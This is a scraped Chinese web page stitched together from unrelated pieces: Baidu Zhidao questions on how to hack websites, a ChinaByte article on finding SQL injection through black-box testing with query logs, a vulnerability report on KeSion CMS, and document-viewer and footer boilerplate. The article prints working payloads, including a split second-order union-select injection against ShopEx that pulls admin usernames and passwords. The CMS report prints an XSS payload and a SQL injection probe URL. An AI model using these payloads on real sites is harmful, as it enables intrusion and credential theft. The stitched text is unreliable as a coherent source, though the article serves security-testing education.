petapoco分页报错有注入漏洞攻击吗?

网页怎么注入??怎么渗透???怎么攻击?怎么试探漏洞?_百度知道
网页怎么注入??怎么渗透???怎么攻击?怎么试探漏洞?
提问者采纳
这太复杂,去看看《黑客入门全程图解》,就会一些简单的攻击和入侵
提问者评价
好啊!谢谢!
其他类似问题
按默认排序
其他3条回答
珍惜生命 远离做黑客
呵呵 从基础做起 攻击网页到最后再干
你去黑客吧看看
也许对你有帮助
您可能关注的推广回答者:
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁比特客户端
您的位置:
详解大数据
详解大数据
详解大数据
详解大数据
黑盒审计之注入漏洞挖掘思路
关键字:黑盒审计 漏洞
  一、注入漏洞简介
  注入漏洞是web应用中最常见的安全漏洞之一,由于一些程序没有过滤用户的输入,攻击者通过向提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句,从而导致注入漏洞的产生。
  攻击者通过SQL注入可以从获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作。常见的建站系统出现SQL注入漏洞风险概率是非常高的,而本文就SQL注入漏洞的挖掘方法和大家分享交流,其他web安全漏洞暂不做探讨。
  二、漏洞挖掘思路
  我们知道在源码审计中这样的SQL注入漏洞很容易被发现,但是对于我们这样不会代码审计又想要挖漏洞的小菜来说该怎么办?那就要讲究方法了,这里和大家分享下我平时挖掘漏洞的一些思路。
  首先一个好的测试环境很重要,这样我们可以在短时间内准确的找出注入的位置。在挖注入漏洞之前我们开启查询日志功能,因为有没有注入的发生,日志里面最直观的看到。
  然后用某个文本查看软件看日志文件打开网站程序里面执行的SQL(我这里用的是Bare Tail)
  接着就是找输入点了,这个是重点 (这个过程也要仔细观察mysql查询日志)。
  有些输入点信息,程序没有过滤直接查询数据库,就造成了注入,
  例如,我GET提交:http://localhost/index2.php?id=1a
  在监控的MYSQL日志中跟随1a,此处出现id=1a,可以看出该处未作处理,
  并且是一个整型变量,且在单引号外面,
  那么我们提交一下URL即可注入,获取数据任意信息。http://localhost/index2.php?id=1%20union%20select%20user%%29%20from%20user
  实际的提交需要根据数据库中查询的语句来构造。
  还有一种情况输入点的信息保存到数据库中,或者服务器的中二次读取时未处理也可导致注入,这种二次注入很多都是不受单引号影响,所以相对来说好利用,危害也是非常大,在mysql日志中跟随输入点的信息,这时一定要仔细调试,一旦出现该信息,我们可以看出是否可利用,根据相关情况构造注入语句。
  三、漏洞实例
  以shopex漏洞挖掘为例,shopex为部分源码加密,解密较为繁琐,涉及文件太多,进行代码审计需要耗费很多时间,然而利用上面的方法即可轻松找出漏洞。
  打开网站,登录后我们随便来到一个产品页面,点击收藏该产品的时候,查看post的信息,其中的75是我们产品的ID,该处也是个输入点。
  我们将其改为74a在提交一次试试,跟随SQL日志,可以看到其执行的语句为。
  可以看到该处是没有经过过滤的,74a已经成功写入数据库了,如果二次取出时也没有过滤将造成注入,我们再来到会员中心页面,该处会在正常操作下显示我们收藏商品。
  此时查看数据库执行日志发现74a已经出现了,由此可以判断该处存在二次注入。
  由于这里是组合而成的,我们构造好注入语句然后拆分提交,即可绕过首页的过滤
  http://localhost/index.php?member-SQL-ajaxAddFav.html
  我们将上面的SQL替换成以下信息,分三次提交:
  0)/**/union/**
  **/select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(username,0x7c,userpass),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/**
  **/from sdb_operatorslimit 1%23
  来到会员中心页面在产品收藏处可以看到管理员信息。
  观察数据库日志可以看到此时执行的SQL语句为
  Query SELECT aGoods.*,aGimage.thumbnail FROM sdb_goods as aGoods left joinsdb_gimages as aGimage on aGoods.image_default=aGimage.gimage_id WHEREaGoods.goods_id IN (0)/**/union/**,**/select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(username,0x7c,userpass),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/**,**/fromsdb_operators limit 1#) LIMIT 0, 10
  补丁地址:/read.php?tid-308423.html
  四、总结
  这个半黑盒测试的流程是:
  开启查询日志------查找输入点-------跟随输入信息--------是否可利用-------构造注入语句
  此过程中的重点就是找输入点和跟随输入信息。
  输入点是我们实施注入的入口点,我们必须有效控制这些才能实现注入,这些输入点可以包含其中一些:
  1)表单提交,主要是POST请求,也包括GET请求。
  2)URL参数提交,主要为GET请求参数。
  3)Cookie参数提交。
  4)HTTP请求头部的一些可修改的值,比如Referer、User_Agent等。
  5)一些边缘的输入点,比如.jpg文件的一些文件信息等。
  有些程序采用了一些错误处理,就算SQL查询语句出错了也是没有任何报错的,这个时候我们只能通过监视SQL查询日志来判断了,一旦有注入漏洞的产生这里将是最先看到。
  熟练运用该方法基本可以找到程序中所有的注入漏洞,且不需要太懂代码,要得只是耐心和细心
相关文章:
[ 责任编辑:小石潭记 ]
社会工程学攻击在近年来的一些网…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯,最新的软件技巧,最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中,与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊!
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧,帮助网管答疑解惑,成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一,主要关注x86服务器,RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析,让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来,为读者提供企业存储领域高质量的原创内容,及时、全面的资讯、技术、方案以及案例文章,力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设,为企业级用户打造最具商业价值的信息沟通平台,并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比,比特安全周刊运作模式更加独立,对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事,为企业级用户打造重点突出,可读性强,商业价值高的信息共享平台;同时为互联网、IT业界及通信厂商提供一条精准快捷,渗透力强,覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展,全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托,汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台,并持续提供丰富的资讯和服务,探讨信息化建设,推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来,以定向、分众、整合的商业模式,为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容,包括IT新闻、评论、专家答疑、技巧和白皮书。此外,IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊,给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍,同时用户还能参与我们推荐的互动游戏,给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注Chinabyte科讯[求助]科讯CMS高危漏洞(跨站脚本攻击及SQL注入漏洞)_百度知道
科讯[求助]科讯CMS高危漏洞(跨站脚本攻击及SQL注入漏洞)
通<img class="word-replace" src="/api/getdecpic?picenc=0af0线网站安全检测漏洞:1、本页面存跨站脚本攻击Plus&#47;Search.asp?Submit=%E6%90%9C%20%E7%B4%A2&KeyWord=88888&script&alert(42873)&&#47;script& 2、目标存SQL注入漏洞item&#47;GetHits.asp?Action=Count&GetFlag=0&ID=1068&m=1%2527 请管理员重视并加强补丁啊
我有更好的答案
按默认排序
我交<img class="word-replace" src="/api/getdecpic?picenc=0a006c655f00元买V.6商业版花1600元买升级虽我直都没用我服务器没商业区能登录让升级仅仅我网公布<img class="word-replace" src="/api/getdecpic?picenc=0a006c655f.5版本太厚道吧
用的是什么程序版本,经测试不存在此情况
其他类似问题
跨站脚本攻击的相关知识
您可能关注的推广
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁扫扫二维码,随身浏览文档
手机或平板扫扫即可继续访问
WEB系统SQL注入攻击分析研究和漏洞检测系统的设计与实现&#46;pdf
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由:
将文档分享至:
分享完整地址
文档地址:
粘贴到BBS或博客
flash地址:
支持嵌入FLASH地址的网站使用
html代码:
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布,请您等待!
3秒自动关闭窗口}

我要回帖

更多关于 sql注入漏洞 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信